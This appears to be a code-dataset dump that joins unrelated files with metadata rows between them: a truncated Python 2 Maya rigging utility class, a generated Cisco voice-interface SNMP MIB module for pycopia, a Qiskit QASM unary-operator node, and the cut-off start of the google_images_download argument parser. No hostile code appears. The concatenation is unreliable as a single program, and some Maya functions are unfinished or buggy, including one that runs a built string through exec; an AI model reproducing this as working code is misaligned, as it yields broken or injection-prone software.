input is valid if not type(selections) is list: KstOut.debug(KstMaya._debug, 'selections must be a list!') errors_list.append('selections') # Check if channels_list input is valid if not type(channels_list) is list: KstOut.debug(KstMaya._debug, 'channels_list must be a list!') errors_list.append('channels') try: # If there are no errors go if len(errors_list) == 0: # Create empty value for python command cmd = '' for sel in selections: for ch in channels_list: for count, arg in enumerate(args): # Build string command cmd = "cmds.setAttr('%s.%s', %s)" % (sel, ch, arg) # Execute string command // ToDo, build a Kistie class for this exec(cmd) # Debug command KstOut.debug(KstMaya._debug, cmd) # Otherwise stop and release errorsList else: KstOut.debug(KstMaya._debug, 'You have some errors: ', errors_list) except: KstOut.error(KstMaya._debug, 'Error found!!! '+str(errors_list)) @staticmethod # Get Shape method def get_shape_node(transform): ''' Desc: return a shape from a transform Parameter: transform = transform node that you want get the shape Return: Shape obj from the transform ''' shape_list = cmds.listRelatives(transform, s=True) if shape_list: shape = shape_list[0] return shape else: #KstOut.debug(self._debug_msg, 'No shapes found in current transform, double check') return None # Get Transform method def get_transform_node(self, shape): ''' Desc: return a transform from a shape Parameter: shape = shape node that you want get the transform Return: Transform obj from the shape ''' try: transform_list = cmds.listRelatives(shape, p=True) if transform_list: transform = transform_list[0] return transform except: KstOut.debug(KstMaya._debug, 'No transform found in current shape, double check') pass # Get Parent method @staticmethod def get_his_parent(obj): ''' Desc: return parent from an object Parameter: obj = object to get the parent Return: Parent object ''' try: parent = cmds.listRelatives(obj, p=True) if parent: return parent except: KstOut.debug(KstMaya._debug, 'No parent object found, double check') pass # Get Parent method @staticmethod def get_his_child(obj): ''' Desc: return child from an object Parameter: obj = object to get the child Return: Parent object ''' try: child = cmds.listRelatives(obj, c=True) if child: return child except: KstOut.debug(KstMaya._debug, 'No child object found, double check') pass # Get all input type (nodeType) nodes in scene def get_node_type(self, node_type): ''' Desc: return a list of node founded from nodeType parameter Parameter: node_type = nodes type to find Return: a list with node of that type defined in input ''' node_list = cmds.ls(type=node_type) found_nodes = [] if node_list: KstOut.debug(KstMaya._debug, str(node_type)+' nodes list: ') for node in node_list: KstOut.debug(KstMaya._debug, 'nodetype = '+str(node_type)+'-> '+str(node)) found_nodes.append(node) else: KstOut.debug(KstMaya._debug, 'nodetype "'+str(node_type)+'" not exists!') return found_nodes # Get all input name (nodeName) nodes in scene def get_node_if_name_contains(self, node_name): ''' Desc: return a list of node founded from nodeName parameter Parameter: node_name = nodes name to find Return: a list with node of that contains name defined in input ''' node_list = cmds.ls() found_nodes = [] if node_list: for node in node_list: if node_name in node: KstOut.debug(KstMaya._debug, '-> '+str(node)) found_nodes.append(node) else: KstOut.debug(KstMaya._debug, str(node_name)+' not exists') return found_nodes # Make a copy of the inputObject def duplicate_this(self, input_object, copy_name='cpy_'): ''' Desc: return a obj that is the copy of inputObject with a name defined in nameOfCopy Parameter: input_object = the object to be copied copy_name = the copy name Return: the obj copied from the original with the new name ''' if input_object: #cmds.select(input_object) copy_object = cmds.duplicate(input_object, smartTransform=True, name = copy_name, renameChildren = True) copy_object[0] = cmds.rename(copy_object[0], copy_name+input_object) #print('DEBUG copy object: ', copy_object) # Search all children of the current object for renaming hierarchy = cmds.listRelatives(copy_object, c=True) if hierarchy: for child in hierarchy: cmds.rename(child, copy_name+child[:-1]) KstOut.debug(KstMaya._debug, str(copy_object[0])+" duplicated from "+str(input_object)) return copy_object else: KstOut.debug(KstMaya._debug, ' inputObject empty, check selection, or array') # Make connection between two node with specified attributes ToDo: add code for test if connection is already in there or not, if it is force delete def node_op(self, src, op, dst): ''' Desc: Make node operation between two object+attributes Parameter: src = source object and attr op = operator: this value can be >> connect SRC to DST << connect DST to SRC \\ disconnect SRC from DST dst = destinatin object and attr Return: bool attribute, True if connection was done, otherwise in all others case False ''' stat = False if src and dst and op: if op == '>>': try: cmds.connectAttr(src, dst, f=True) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred making connection src, dst') KstOut.debug(KstMaya._debug, 'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') print 'CANNOT ', src, dst elif op == '<<': try: cmds.connectAttr(dst, src, f=True) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred making connection dst, src') KstOut.debug(KstMaya._debug,'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') # print '' elif op == '||': try: cmds.disconnectAttr(src, dst, f=True) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred in disconnection') KstOut.debug(KstMaya._debug, 'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') # print '' else: KstOut.debug(KstMaya._debug, ' symbol not defined, you can use (>>, <<, ||)') stat = False return stat else: KstOut.debug(KstMaya._debug, ' double check inputs (source, operator, destination)') KstOut.error(KstMaya._debug, ' double check inputs (source, operator, destination)') return None # Destroy all connections, finally works with keyframes and normal connections def destroy_channels_connections(self, sel, channels_list): ''' Desc: Destroy connections for selected channels sel = current object *args = list of channels to disconnect in format [ch,ch,ch,...] ''' for ch in channels_list: src_attr = cmds.connectionInfo(sel+'.'+ch, sourceFromDestination=True) if src_attr: KstOut.debug(KstMaya._debug, 'SOURCE: '+src_attr) KstOut.debug(KstMaya._debug, 'DEST: '+sel+'.'+ch) cmds.disconnectAttr(src_attr, sel+'.'+ch) # Make constraint in more simple mode def make_constraint(self, src, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weight=1, aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None): ''' Desc: Make any contraint Parameter: src = source object object contraint from dst = destination object constraint to: constraintType = constraint type offset = mantaintOffset bool val Return: contraint str name ''' # var for constraint name constraint = [] type='' # Fix name name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '') # Parent constraint if constraint_type == 'parent': type='PAC' constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weight, st=skip_translate, name=name+'_'+type) # Point constraint elif constraint_type == 'point': type='PC' constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_translate, name=name+'_'+type) # Orient constraint elif constraint_type == 'orient': type='OC' constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, name=name+'_'+type) # Aim constraint, ToDo, optimize elif constraint_type == 'aim': type='AC' if world_up_type == 'object': if world_up_object == None: KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None") else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type) else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type) #constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type)) # Delete constraint node if needed if keep_constraint_node == False: cmds.delete(constraint) return constraint # Make multi constraint in more simple mode def make_multi_constraint(self, src_list, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weights_list=[1.0], aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None): ''' Desc: Make multiconstraint for any contraint Parameter: src = source object object contraint from dst = destination object constraint to: constraintType = constraint type offset = mantaintOffset bool val Return: contraint str name ''' # var for constraint name constraint = [] type='' # Fix name name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '') # Loop each element in src_list i = 0 for src in src_list: # Parent constraint if constraint_type == 'parent': type='PAC' constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weights_list[i], st=skip_translate, name=name+'_'+type) i = i+1 # Point constraint elif constraint_type == 'point': type='PC' constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_translate, name=name+'_'+type) i = i+1 # Orient constraint elif constraint_type == 'orient': type='OC' constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, name=name+'_'+type) i = i+1 # Aim constraint, ToDo, optimize elif constraint_type == 'aim': type='AC' if world_up_type == 'object': if world_up_object == None: KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None") else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type) else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type) i = i+1 #constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type)) # Delete constraint node if needed if keep_constraint_node == False: cmds.delete(constraint) return constraint # Get position list from object position def get_position_list_from_objs(self, object_list, coords_space='world'): ''' Desc: Get a position list from object list Parameter: object_list = the object list coords_space = the coordinat space, can be "world" (default), or "local" Return: list with positions ''' position_list = [] # Check if position list is valid if object_list: # Set coords to world if coords_space == 'world': world_space = True object_space = False # Set coord to local elif coords_space == 'local': world_space = False object_space = True for obj in object_list: KstOut.debug(KstMaya._debug, obj) obj_pos = cmds.xform(obj, q=True, t=True, ws=world_space, os=object_space) position_list.append(obj_pos) return position_list else: KstOut.debug(KstMaya._debug, 'Check if inputs are valid') return None # Get cvs list def get_num_cvs(self, curve): ''' Desc: Get cvs lenght from a curve Parameter: curve = curve to get cvs positin list from coords_space = the coordinat space, can be "world" (default), or "local" Return: list with positions ''' # If curve is nod define or not correct release error if curve: # Get curve shape curve_shape = KstMaya.get_shape_node(curve) # Get degree degree = cmds.getAttr(curve_shape+".degree") # Get spans spans = cmds.getAttr(curve_shape+".spans") # Calulating ncvs with formula spans+degree ncvs = spans+degree # Return the list return ncvs else: cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve) return None @staticmethod # Get position list from cvs position def get_cvs_position_list_from_curve(curve, coords_space='world'): ''' Desc: Get cv position list from a curve Parameter: curve = curve to get cvs positin list from coords_space = the coordinat space, can be "world" (default), or "local" Return: list with positions ''' # If curve is nod define or not correct release error if curve: # Define a list with all positions position_list = [] # Define ws var ws = False # Get curve shape curve_shape = KstMaya.get_shape_node(curve) # Get degree degree = cmds.getAttr(curve_shape+".degree") # Get spans spans = cmds.getAttr(curve_shape+".spans") # Calulating ncvs with formula spans+degree ncvs = spans+degree # Define and set ws var for xform if coords_space=='world': ws = True # Iterate over curve cvs for i in range(0, ncvs): pos = cmds.xform(curve_shape+".cv[%s]" % i, q = True, t = True, ws = ws) position_list.append(pos) # Return the list return position_list else: cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve) return None def transfer_connections(self, src, dst, connections_list, mode = 'move'): ''' Desc: Copy or Move, connections from one node to another one Parameter: src = source object move (or copy) connections from dst = destination object move (or copy) connections to connections_list = connections list to move or copy Return: None ''' # List connections for src if len(connections_list): for conn in connections_list: src_connections = cmds.listConnections('%s.%s' % (src, conn), c = True, plugs = True) # Now in src_connections[0] there's the original src, and in src_connectons[0] the original destination # so, just replace the src_name # Store the current connection curr_conn = src_connections[0].split('.')[1] # If mode is setted on move disconnect old object if mode == 'move': self.node_op(src_connections[0], '||', src_connections[1]) # Exchange src with specified destination new_src = dst # Reconnect self.node_op('%s.%s' % (new_src, curr_conn), '>>', src_connections[1]) # Insert element in hierarchy def insert_parent(self, src, dst, reset_src_trs = True): ''' Desc: Insert an object in the middle of an existing hierarchy Parameter: src = object to insert dst = destination object that will be reparented Return: None ''' # Check existing hierarchy # Who's the parent parent = KstMaya.get_his_parent(dst) # Who's the child child = KstMaya.get_his_child(dst) # Remake hiararchy cmds.parent(src, parent) cmds.parent(child, src) return parent, src, child def mirror_this(self, obj_to_mirror, plane = 'YZ'): # ToDo: finish and check ''' Desc: Mirror object Parameter: src = object to insert dst = destination object that will be reparented Return: None ''' mirrored = obj_to_mirror.replace('L','R') trs = cmds.xform(obj_to_mirror, q=True, t=True, ws=True) trs_vec = om.MVector(float(trs[0]), float(trs[1]), float(trs[2])) if plane == 'YZ': mirror_axis = om.MVector(-1, 1, 1) if plane == 'XZ': mirror_axis = om.MVector(1, -1, 1) if plane == 'YZ': mirror_axis = om.MVector(1, 1, -1) else: pass mirrored_coords = om.MVector(trs_vec.x * mirror_axis.x, trs_vec.y * mirror_axis.y, trs_vec.z * mirror_axis.z) cmds.setAttr('%s.%s' % (mirrored, 'tx'), mirrored_coords.x ) cmds.setAttr('%s.%s' % (mirrored, 'ty'), mirrored_coords.y ) cmds.setAttr('%s.%s' % (mirrored, 'tz'), mirrored_coords.z ) return mirrored_coords # calculate the closest vertex from give distance def get_closest_vertices_between(self, src, dst, dist): # ToDo: check code ''' Desc: Insert an object in the middle of an existing hierarchy Parameter: src = object to insert dst = destination object that will be reparented Return: None ''' # Get the relative MObject for use method API for source and destination oSrc = KstCore.get_mobject_from_name(src) oDst = KstCore.get_mobject_from_name(dst) # Get the relative DAG for use method API for source and destination dSrc = KstCore.get_dag_from_node_name(src) dDst = KstCore.get_dag_from_node_name(dst) # Attach mesh functions to src and dst objects srcFnMesh = om.MFnMesh(dSrc) dstFnMesh = om.MFnMesh(dDst) # Define the list for closestVertex storage closest_vlist = list() # Check if the datatype is mesh if srcFnMesh.type() == om.MFn.kMesh and dstFnMesh.type() == om.MFn.kMesh: srcItVert = om.MItMeshVertex(oSrc) dstItVert = om.MItMeshVertex(oDst) # Define variables for mesh iterator srcVtxPos = om.MPoint() dstVtxPos = om.MPoint() ws = om.MSpace.kObject # Define empty point cloud for stora all position from the iterator srcVtxsPos = om.MPointArray() # Define empty point cloud for store closest points result closestPoints = om.MPointOnMesh() # Define MMeshIntersector on destination mesh for get closest point meshIntersector = om.MMeshIntersector() # Define a DAGPath for retrieve selection based on component selectionClosest = om.MSelectionList() selection_dag = om.MDagPath() # Iterate over all mesh vertices, and get all positions while not srcItVert.isDone(): # Get current position srcVtxPos = srcItVert.position(ws) while not dstItVert.isDone(): srcVtxDest = dstItVert.position(ws) mag = KstMath.get_mag(KstMath.vec_from_2_points(srcVtxPos, srcVtxDest)) if mag <= dist: closest_vlist.append(dstItVert.index()) cmds.select(dst+'.vtx[%s]' % dstItVert.index(), add=True) dstItVert.next() srcItVert.next() print('ARRAY CLOSEST: ', closest_vlist) ''' clothRigGrp = "clothAnimRig_GRP" jntPos = cmds.xform(jnt, q=True, ws=True, t=True) sel = sel.replace("[u'","") sel = sel.replace("']","") scluster = str(sknMsh) scluster = scluster.replace("[u'","") scluster = scluster.replace("']","") vtxs = cmds.polyEvaluate(sel, v=True) ntotVtxs = vtxs/njoints closestPoints = [] #print jntPos #for i in xrange(vtxs): for i in range(500): vtx = (sel+".vtx["+str(i)+"]") print " " print vtx if cmds.progressBar(progressControl, query = True, isCancelled = True): break #if i%2 == 1: ppos = [] ppos = cmds.xform((sel+".vtx["+str(i)+"]"), q = True, ws = True, t = True) newpos = [ppos[0] - jntPos[0], ppos[1] - jntPos[1], ppos[2] - jntPos[2]] res = mag(newpos) cmds.text(stat, edit=True, label = (str(i)+"/"+str(vtxs))) skinJointsList = maya.mel.eval('skinPercent -query -transform %(scluster)s %(vtx)s' %vars()) # ToDo: skinCluster conversion\ trackers = [] weights = [] newjnt = [] cpStra = 'pointConstraint -mo ' cpStrb = '' for obj in skinJointsList: transform = obj joints = (obj+".vtx["+str(i)+"]JNT") skinValue = maya.mel.eval('skinPercent -transform %(transform)s -query -value %(scluster)s %(vtx)s' %vars()) #print ("DEBUG: "+str(transform)+" VALUE: "+str(skinValue)) if (res <= dist): newjnt = cmds.joint(n = (obj+".vtx["+str(i)+"]JNT"),p = ppos) cmds.setAttr((newjnt+'.radius'),.05) cmds.parent(newjnt, clothRigGrp) trackers.append(obj) weights.append(skinValue) if len(trackers) > 0: print trackers print weights #print trackers #print weights #cmds.pointConstraint(trackers, newjnt, mo = True) #cpStra+= ('%(trackers)s ') #cpStrj= ('%(joints)s ') #cpStrb+= ('%(weights)s ') #print(cpStra+cpStrj) #print trackers #print weights cmds.progressBar(progressControl, edit = True, step = 1) ''' # Abc code def abc_import(self, mode='Import', namespace='', file_path=''): cmdStr = '' # Import if mode == 'Import': cmds.file(file_path, i=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace) # Reference if mode == 'Reference': cmds.file(file_path, r=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace) def foo(self): pass
bsd-3-clause
-8,954,775,622,513,176,000
34.689055
303
0.545569
false
4.001813
false
false
false
xiangke/pycopia
mibs/pycopia/mibs/CISCO_VOICE_IF_MIB.py
1
6172
# python # This file is generated by a program (mib2py). Any edits will be lost. from pycopia.aid import Enum import pycopia.SMI.Basetypes Range = pycopia.SMI.Basetypes.Range Ranges = pycopia.SMI.Basetypes.Ranges from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject # imports from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP from IF_MIB import ifIndex from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, Integer32 from CISCO_TC import CountryCode from CISCO_SMI import ciscoMgmt from SNMPv2_TC import TruthValue, DisplayString class CISCO_VOICE_IF_MIB(ModuleObject): path = '/usr/share/snmp/mibs/site/CISCO-VOICE-IF-MIB' conformance = 3 name = 'CISCO-VOICE-IF-MIB' language = 2 description = 'Common Voice Interface MIB module.\nThe MIB module manages the common voice related parameters\nfor both voice analog and ISDN interfaces.' # nodes class ciscoVoiceInterfaceMIB(NodeObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64]) name = 'ciscoVoiceInterfaceMIB' class cvIfObjects(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1]) name = 'cvIfObjects' class cvIfCfgObjects(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1]) name = 'cvIfCfgObjects' class cvIfConformance(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2]) name = 'cvIfConformance' class cvIfCompliances(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 1]) name = 'cvIfCompliances' class cvIfGroups(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2]) name = 'cvIfGroups' # macros # types # scalars # columns class cvIfCfgNoiseRegEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 1]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgNonLinearProcEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 2]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgMusicOnHoldThreshold(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 3]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dBm' class cvIfCfgInGain(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 4]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dB' class cvIfCfgOutAttn(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 5]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dB' class cvIfCfgEchoCancelEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 6]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgEchoCancelCoverage(ColumnObject): status = 1 access = 5 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 7]) syntaxobject = pycopia.SMI.Basetypes.Enumeration enumerations = [Enum(1, 'echoCanceller16ms'), Enum(2, 'echoCanceller24ms'), Enum(3, 'echoCanceller32ms')] class cvIfCfgConnectionMode(ColumnObject): status = 1 access = 5 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 8]) syntaxobject = pycopia.SMI.Basetypes.Enumeration enumerations = [Enum(1, 'normal'), Enum(2, 'trunk'), Enum(3, 'plar')] class cvIfCfgConnectionNumber(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 9]) syntaxobject = pycopia.SMI.Basetypes.DisplayString class cvIfCfgInitialDigitTimeOut(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 10]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'seconds' class cvIfCfgInterDigitTimeOut(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 11]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'seconds' class cvIfCfgRegionalTone(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 12]) syntaxobject = CountryCode # rows class cvIfCfgEntry(RowObject): status = 1 index = pycopia.SMI.Objects.IndexObjects([ifIndex], False) OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1]) access = 2 columns = {'cvIfCfgNoiseRegEnable': cvIfCfgNoiseRegEnable, 'cvIfCfgNonLinearProcEnable': cvIfCfgNonLinearProcEnable, 'cvIfCfgMusicOnHoldThreshold': cvIfCfgMusicOnHoldThreshold, 'cvIfCfgInGain': cvIfCfgInGain, 'cvIfCfgOutAttn': cvIfCfgOutAttn, 'cvIfCfgEchoCancelEnable': cvIfCfgEchoCancelEnable, 'cvIfCfgEchoCancelCoverage': cvIfCfgEchoCancelCoverage, 'cvIfCfgConnectionMode': cvIfCfgConnectionMode, 'cvIfCfgConnectionNumber': cvIfCfgConnectionNumber, 'cvIfCfgInitialDigitTimeOut': cvIfCfgInitialDigitTimeOut, 'cvIfCfgInterDigitTimeOut': cvIfCfgInterDigitTimeOut, 'cvIfCfgRegionalTone': cvIfCfgRegionalTone} # notifications (traps) # groups class cvIfGroup(GroupObject): access = 2 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 1]) group = [cvIfCfgNoiseRegEnable, cvIfCfgNonLinearProcEnable, cvIfCfgMusicOnHoldThreshold, cvIfCfgInGain, cvIfCfgOutAttn, cvIfCfgEchoCancelEnable, cvIfCfgEchoCancelCoverage, cvIfCfgInitialDigitTimeOut, cvIfCfgInterDigitTimeOut, cvIfCfgRegionalTone] class cvIfConnectionGroup(GroupObject): access = 2 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 2]) group = [cvIfCfgConnectionMode, cvIfCfgConnectionNumber] # capabilities # special additions # Add to master OIDMAP. from pycopia import SMI SMI.update_oidmap(__name__)
lgpl-2.1
-397,005,942,782,059,600
33.870056
607
0.733798
false
2.627501
false
false
false
atilag/qiskit-sdk-py
qiskit/qasm/_node/_unaryoperator.py
1
1662
# -*- coding: utf-8 -*- # Copyright 2017 IBM RESEARCH. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """ Node for an OPENQASM unary operator. """ import operator from ._node import Node from ._nodeexception import NodeException VALID_OPERATORS = { '+': operator.pos, '-': operator.neg, } class UnaryOperator(Node): """Node for an OPENQASM unary operator. This node has no children. The data is in the value field. """ def __init__(self, operation): """Create the operator node.""" Node.__init__(self, 'unary_operator', None, None) self.value = operation def operation(self): """ Return the operator as a function f(left, right). """ try: return VALID_OPERATORS[self.value] except KeyError: raise NodeException("internal error: undefined prefix '%s'" % self.value) def qasm(self, prec=15): """Return QASM representation.""" # pylint: disable=unused-argument return self.value
apache-2.0
6,572,356,457,025,158,000
28.678571
79
0.619134
false
4.373684
false
false
false
hardikvasa/google-images-download
google_images_download/google_images_download.py
1
52513
#!/usr/bin/env python # In[ ]: # coding: utf-8 ###### Searching and Downloading Google Images to the local disk ###### # Import Libraries import sys version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above import urllib.request from urllib.request import Request, urlopen from urllib.request import URLError, HTTPError from urllib.parse import quote import http.client from http.client import IncompleteRead, BadStatusLine http.client._MAXHEADERS = 1000 else: # If the Current Version of Python is 2.x import urllib2 from urllib2 import Request, urlopen from urllib2 import URLError, HTTPError from urllib import quote import httplib from httplib import IncompleteRead, BadStatusLine httplib._MAXHEADERS = 1000 import time # Importing the time library to check the time of code execution import os import argparse import ssl import datetime import json import re import codecs import socket args_list = ["keywords", "keywords_from_file", "prefix_keywords", "suffix_keywords", "limit", "format", "color", "color_type", "usage_rights", "size", "exact_size", "aspect_ratio", "type", "time", "time_range", "delay", "url", "single_image", "output_directory", "image_directory", "no_directory", "proxy", "similar_images", "specific_site", "print_urls", "print_size", "print_paths", "metadata", "extract_metadata", "socket_timeout", "thumbnail", "thumbnail_only", "language", "prefix", "chromedriver", "related_images", "safe_search", "no_numbering", "offset", "no_download","save_source","silent_mode","ignore_urls"] def user_input(): config = argparse.ArgumentParser() config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False) config_file_check = config.parse_known_args() object_check = vars(config_file_check[0]) if object_check['config_file'] != '': records = [] json_file = json.load(open(config_file_check[0].config_file)) for record in range(0,len(json_file['Records'])): arguments = {} for i in args_list: arguments[i] = None for key, value in json_file['Records'][record].items(): arguments[key] = value records.append(arguments) records_count = len(records) else: # Taking command line arguments from users parser = argparse.ArgumentParser() parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False) parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False) parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after to main keyword', type=str, required=False) parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before main keyword', type=str, required=False) parser.add_argument('-l', '--limit', help='delimited list input', type=str, required=False) parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False, choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico']) parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False) parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False) parser.add_argument('-o', '--output_directory', help='download images in a specific main directory', type=str, required=False) parser.add_argument('-i', '--image_directory', help='download images in a specific sub-directory', type=str, required=False) parser.add_argument('-n', '--no_directory', default=False, help='download images in the main directory but no sub-directory', action="store_true") parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=int, required=False) parser.add_argument('-co', '--color', help='filter on color', type=str, required=False, choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown']) parser.add_argument('-ct', '--color_type', help='filter on color', type=str, required=False, choices=['full-color', 'black-and-white', 'transparent']) parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False, choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse']) parser.add_argument('-s', '--size', help='image size', type=str, required=False, choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP']) parser.add_argument('-es', '--exact_size', help='exact image resolution "WIDTH,HEIGHT"', type=str, required=False) parser.add_argument('-t', '--type', help='image type', type=str, required=False, choices=['face','photo','clipart','line-drawing','animated']) parser.add_argument('-w', '--time', help='image age', type=str, required=False, choices=['past-24-hours','past-7-days','past-month','past-year']) parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False) parser.add_argument('-a', '--aspect_ratio', help='comma separated additional words added to keywords', type=str, required=False, 